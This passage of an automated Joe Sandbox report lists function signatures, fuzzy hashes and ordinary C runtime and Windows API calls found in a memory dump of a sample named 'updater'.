                                  • String ID:
                                  • API String ID: 838279627-0
                                  • Opcode ID: cc48e82adb332d31cbb183ecb34731f44567de65b8a4a7d1be2f4ba500a74f70
                                  • Instruction ID: fb6f36e6130b0f219aec53ded54495083453ab39bc3c792549b8cb05db46afe9
                                  • Opcode Fuzzy Hash: cc48e82adb332d31cbb183ecb34731f44567de65b8a4a7d1be2f4ba500a74f70
                                  • Instruction Fuzzy Hash: 2BC17275D0024ADFDF15DFD9C984AEEBBB9FF18310F14042AE909A7264D730AA45CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strcspn$H_prolog3_ctype
                                  • String ID:
                                  • API String ID: 838279627-0
                                  • Opcode ID: e7d7040d67ec2da2dc489d803d4f2e13575fb3bd6efa0473f278573c39ff703a
                                  • Instruction ID: fe8152df7711d82d70ba2907e43f03a89d53b76cdc35b3cc1b14767498f5188e
                                  • Opcode Fuzzy Hash: e7d7040d67ec2da2dc489d803d4f2e13575fb3bd6efa0473f278573c39ff703a
                                  • Instruction Fuzzy Hash: 0CC1807190024ADFDF16DF99C9809EEBFB9FF18311F14042AE945AB3A1D730A945CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 64e63b27e12eb1413ee2d37db0e9a926ef610b5954a7201da50871f62c8b3315
                                  • Instruction ID: 03b7cf7165eafe253132e9604dd3a01bfc0c5e668816869b251ed751501d3eb8
                                  • Opcode Fuzzy Hash: 64e63b27e12eb1413ee2d37db0e9a926ef610b5954a7201da50871f62c8b3315
                                  • Instruction Fuzzy Hash: AF51D3B25002269FEB258F59D840B7B7BA5EF25B10F94012FE901E77B0D731A9C1C7A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 627792d66e7c881e42c297e03121cb583cd64125a33ab9466e90443b966a2689
                                  • Instruction ID: b133b6038990cc40228b13b9872417b22386dfff358a416b1c896eac04a3b620
                                  • Opcode Fuzzy Hash: 627792d66e7c881e42c297e03121cb583cd64125a33ab9466e90443b966a2689
                                  • Instruction Fuzzy Hash: B841DF76A00215AFE7259F69C840BAABBF8FBAC710F10856FE111DB3A0D275E9408780
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _free.LIBCMT ref: 0143F85E
                                  • _free.LIBCMT ref: 0143F887
                                  • SetEndOfFile.KERNEL32(00000000,0143C3CA,00000000,01430CCF,?,?,?,?,?,?,?,0143C3CA,01430CCF,00000000), ref: 0143F8B9
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0143C3CA,01430CCF,00000000,?,?,?,?,00000000), ref: 0143F8D5
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFileLast
                                  • String ID:
                                  • API String ID: 1547350101-0
                                  • Opcode ID: 49e413c35f1052fb735c36487a481badbd0557dc1e579f005233cc51db7257fc
                                  • Instruction ID: c2642f892cd0817a131b7bc5bcdf2e0daa1239b7c69a1284cf4c40332e9d33f5
                                  • Opcode Fuzzy Hash: 49e413c35f1052fb735c36487a481badbd0557dc1e579f005233cc51db7257fc
                                  • Instruction Fuzzy Hash: B541A472D00512ABDB1DAFBBCC40A9E7A75EFEC320F14051BE914A72B0D734D4498762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualQuery.KERNEL32(83000000,CE5F1F10,0000001C,CE5F1F10,?,?,?), ref: 01441656
                                  • __FindPESection.LIBCMT ref: 01441693
                                  • _ValidateScopeTableHandlers.LIBCMT ref: 014416B3
                                  • __FindPESection.LIBCMT ref: 014416CD
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FindSection$HandlersQueryScopeTableValidateVirtual
                                  • String ID:
                                  • API String ID: 1876002356-0
                                  • Opcode ID: 2c0497725e8c3e9d23a3499e6f28187a2fff20a88795f40e0113d98dbe5a05f0
                                  • Instruction ID: fbc8ea4b10cf2899c9f74c2843560d1f52e6a44d29889529055a2097acdab71a
                                  • Opcode Fuzzy Hash: 2c0497725e8c3e9d23a3499e6f28187a2fff20a88795f40e0113d98dbe5a05f0
                                  • Instruction Fuzzy Hash: 4D318275A002169BFB24DB6DE9807AE77A8EB08A54F05016ADD09E7375E731FC80CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58d5d8d05624b6d8d656217d09eac91eb6adfe9506b98ff5e336235b4ae8baf5
                                  • Instruction ID: 5c7187c76854ad44ed14da0a485cebc837ad2f70d50718727fdb14665303f598
                                  • Opcode Fuzzy Hash: 58d5d8d05624b6d8d656217d09eac91eb6adfe9506b98ff5e336235b4ae8baf5
                                  • Instruction Fuzzy Hash: 3021C8F1604126BF9B11AF668C90D6BB76CEF58664761451AFC24C7AB0D734DC818760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
                                  • _free.LIBCMT ref: 014304FD
                                  • _free.LIBCMT ref: 01430533
                                  • SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: 948a9e4cf062f8d74c64f33e4ed6dc2d89af9d1ee1c5179a3c728b6fb31822a4
                                  • Instruction ID: a842b0507eb6693c04879afd80551f586ca1edf8d82f6e937ff0a9f16f477084
                                  • Opcode Fuzzy Hash: 948a9e4cf062f8d74c64f33e4ed6dc2d89af9d1ee1c5179a3c728b6fb31822a4
                                  • Instruction Fuzzy Hash: 7F11EC722062023BD621667B6C84E2B356BABF4775B55073FF628872F4EE718C458231
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,01423CA9,01430149,?,?,0142DA9C), ref: 014305F7
                                  • _free.LIBCMT ref: 01430654
                                  • _free.LIBCMT ref: 0143068A
                                  • SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01423CA9,01430149,?,?,0142DA9C), ref: 01430695
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_free
                                  • String ID:
                                  • API String ID: 2283115069-0
                                  • Opcode ID: b8882117d22aada1aaaabbb6887fbcefe890f7b84d539de7a3eef630c3731e06
                                  • Instruction ID: f6aad544e5b56f7c91d8c22e1806c316c8390783ae69ac3b0b09076957dda0f1
                                  • Opcode Fuzzy Hash: b8882117d22aada1aaaabbb6887fbcefe890f7b84d539de7a3eef630c3731e06
                                  • Instruction Fuzzy Hash: 7411E9712052013AD621667B5C84E2B366AABE8779B74072BF62C832F9EE7188459221
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __EH_prolog3_GS.LIBCMT ref: 01408652
                                    • Part of subcall function 014070FE: std::_Lockit::_Lockit.LIBCPMT ref: 0140710F
                                    • Part of subcall function 014070FE: int.LIBCPMT ref: 01407126
                                    • Part of subcall function 014070FE: std::_Lockit::~_Lockit.LIBCPMT ref: 01407180
                                  • _Find_elem.LIBCPMT ref: 01408864
                                  Strings
                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 014086BA
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                  • API String ID: 2124549159-2799312399
                                  • Opcode ID: 32f6fb17dfc5b49fcb2f256eeb87eb67b224ac993aa25d72d7819008ca226ad9
                                  • Instruction ID: 631099ef377126c3df2c33839c9fcc66575de519ea449461f3389a53165b996f
                                  • Opcode Fuzzy Hash: 32f6fb17dfc5b49fcb2f256eeb87eb67b224ac993aa25d72d7819008ca226ad9
                                  • Instruction Fuzzy Hash: 7CD18F31D0428A8AEF17EBAACA507EDBBB1AF55310F28406ED4856B3E7CB345945CB11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __EH_prolog3_GS.LIBCMT ref: 014104AA
                                    • Part of subcall function 0140C8C4: std::_Lockit::_Lockit.LIBCPMT ref: 0140C8D5
                                    • Part of subcall function 0140C8C4: int.LIBCPMT ref: 0140C8EC
                                    • Part of subcall function 0140C8C4: std::_Lockit::~_Lockit.LIBCPMT ref: 0140C946
                                  • _Find_elem.LIBCPMT ref: 014106FA
                                  Strings
                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 01410521
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                  • API String ID: 2124549159-2799312399
                                  • Opcode ID: 9dfaf43fe63344b3f0e22b11c8cec3605007065f889cc74eb070bf9b66cb1fb0
                                  • Instruction ID: e6b120ab0a20672a9351bae87efca96c663878a9772fe7db454e81ae1acac1bd
                                  • Opcode Fuzzy Hash: 9dfaf43fe63344b3f0e22b11c8cec3605007065f889cc74eb070bf9b66cb1fb0
                                  • Instruction Fuzzy Hash: 5FD1C431D042598EEF26DF68C8907EDBBB1BF54314F54409FE849AB2AADB7488C5CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __EH_prolog3_GS.LIBCMT ref: 014108CD
                                    • Part of subcall function 0140C959: std::_Lockit::_Lockit.LIBCPMT ref: 0140C96A
                                    • Part of subcall function 0140C959: int.LIBCPMT ref: 0140C981
                                    • Part of subcall function 0140C959: std::_Lockit::~_Lockit.LIBCPMT ref: 0140C9DB
                                  • _Find_elem.LIBCPMT ref: 01410B1D
                                  Strings
                                  • 0123456789ABCDEFabcdef-+Xx, xrefs: 01410944
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
                                  • String ID: 0123456789ABCDEFabcdef-+Xx
                                  • API String ID: 2124549159-2799312399
                                  • Opcode ID: 1374231511097c62cf231908f81ebffc08a49434c132252ccd0023f0241cbab4
                                  • Instruction ID: 0e6f8cf93bf382204cf938e545bced2ea5597edc38cc587f03e4f93a41bbc883
                                  • Opcode Fuzzy Hash: 1374231511097c62cf231908f81ebffc08a49434c132252ccd0023f0241cbab4
                                  • Instruction Fuzzy Hash: ECD1A431D043598EEF25DFA8C8547EDBBB2BF15314F14819BE489AB2AADB3448C5CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __startOneArgErrorHandling.LIBCMT ref: 0142AC0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorHandling__start
                                  • String ID: pow
                                  • API String ID: 3213639722-2276729525
                                  • Opcode ID: 9b0b7a05004cc97096162a00293aa488ab4c3b3cbeba089b180eb6b093b1f558
                                  • Instruction ID: 433252c452fda62f6f37bbf328cd2c67cab97d98df292f4894302a503a0ed3f4
                                  • Opcode Fuzzy Hash: 9b0b7a05004cc97096162a00293aa488ab4c3b3cbeba089b180eb6b093b1f558
                                  • Instruction Fuzzy Hash: 91518DA2A0810287DB22771CC90036B3FA1AB94702F744D6BF9D1437BDEB3584C68B86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 3732870572-1956417402
                                  • Opcode ID: c3b986e031dee0ffbadab2901858db657b32e6cbe40d88221e539db838937c7b
                                  • Instruction ID: 117aa85a7c36e1ae8dffa415458e4f3c186799d9d5e8281cb0fe3e42eef4c99d
                                  • Opcode Fuzzy Hash: c3b986e031dee0ffbadab2901858db657b32e6cbe40d88221e539db838937c7b
                                  • Instruction Fuzzy Hash: A4510331B842899BDF26CEAD9CC07BFBFB5AF45240F04405BEA81D7368C2748942DB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %.2x
                                  • API String ID: 0-936724101
                                  • Opcode ID: 62c47a4ad1560dd0017e2bce02e7afcbc20bc2e780504b629c08bfed24238919
                                  • Instruction ID: ac0b62a6df79c737698a95ec30f2759857d589a82700113ad2539ca1f6276c67
                                  • Opcode Fuzzy Hash: 62c47a4ad1560dd0017e2bce02e7afcbc20bc2e780504b629c08bfed24238919
                                  • Instruction Fuzzy Hash: 6751D971A04B52EFD714CF6CC485BA0BBE4BF19214F14816AE988CBA92E330E551CFE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __EH_prolog3_GS.LIBCMT ref: 0141C413
                                  • swprintf.LIBCMT ref: 0141C485
                                    • Part of subcall function 01406F3F: std::_Lockit::_Lockit.LIBCPMT ref: 01406F50
                                    • Part of subcall function 01406F3F: int.LIBCPMT ref: 01406F67
                                    • Part of subcall function 01406F3F: std::_Lockit::~_Lockit.LIBCPMT ref: 01406FC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Lockitstd::_$H_prolog3_Lockit::_Lockit::~_swprintf
                                  • String ID: %.0Lf
                                  • API String ID: 2921955253-1402515088
                                  • Opcode ID: dfdef55e8348d9156d0674231990eb24d947abd5299beaf5b6daf3f92eac9957
                                  • Instruction ID: 23b029f36fb59e8ba71971d941daf4e81c9685f768dda0220d9747ef4680d0f2
                                  • Opcode Fuzzy Hash: dfdef55e8348d9156d0674231990eb24d947abd5299beaf5b6daf3f92eac9957
                                  • Instruction Fuzzy Hash: A9516C71D00209AFCF09DFD4C884AEDBBB5FF18310F10441AE856AB2A9DB759955CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 014217CB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID: MOC$RCC
                                  • API String ID: 2118026453-2084237596
                                  • Opcode ID: f7574ee6f1876c40c7f615f8ceb61922a401218ec6eb5decdb974d15092cad7b
                                  • Instruction ID: 1f4aa7565a5a18936e4060d14eba93aa2b52d71d2aee6bb2d611eb15079249e8
                                  • Opcode Fuzzy Hash: f7574ee6f1876c40c7f615f8ceb61922a401218ec6eb5decdb974d15092cad7b
                                  • Instruction Fuzzy Hash: 63418B72900219AFDF16DF98CD80AEE7BB5FF48700F5481AAFA04A7221D3759991DB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: H_prolog3___cftoe
                                  • String ID: !%x
                                  • API String ID: 855520168-1893981228
                                  • Opcode ID: 780bb4b88363005d8657245f1107ddd34d242d86e0374f673771efe415688b75
                                  • Instruction ID: e22bba143ed604ccda7b92ed492c44edc7e19a7710c813c94016c673bf36f62c
                                  • Opcode Fuzzy Hash: 780bb4b88363005d8657245f1107ddd34d242d86e0374f673771efe415688b75
                                  • Instruction Fuzzy Hash: F43128B1D0120EAFCF04EF98E980AEEBBB5FF18314F10441AF504A7265E735AA45CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0140B5E6: _Maklocstr.LIBCPMT ref: 0140B606
                                    • Part of subcall function 0140B5E6: _Maklocstr.LIBCPMT ref: 0140B623
                                    • Part of subcall function 0140B5E6: _Maklocstr.LIBCPMT ref: 0140B640
                                    • Part of subcall function 0140B5E6: _Maklocchr.LIBCPMT ref: 0140B652
                                    • Part of subcall function 0140B5E6: _Maklocchr.LIBCPMT ref: 0140B665
                                  • _Mpunct.LIBCPMT ref: 0141262F
                                  • _Mpunct.LIBCPMT ref: 01412649
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Maklocstr$MaklocchrMpunct
                                  • String ID: $+xv
                                  • API String ID: 542472742-1686923651
                                  • Opcode ID: 4e60e8b0cc1c2f66381483ca24462569536c14bba431271408b1c368d4fbbfeb
                                  • Instruction ID: bdc01ee2df531500771299c82aa1bf4b70f01216f732707d81ce28f2ed71423d
                                  • Opcode Fuzzy Hash: 4e60e8b0cc1c2f66381483ca24462569536c14bba431271408b1c368d4fbbfeb
                                  • Instruction Fuzzy Hash: B921C4B1904B526FD726DF768890B7BBEF8BB28200F14095FE459C7A90D774E641CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
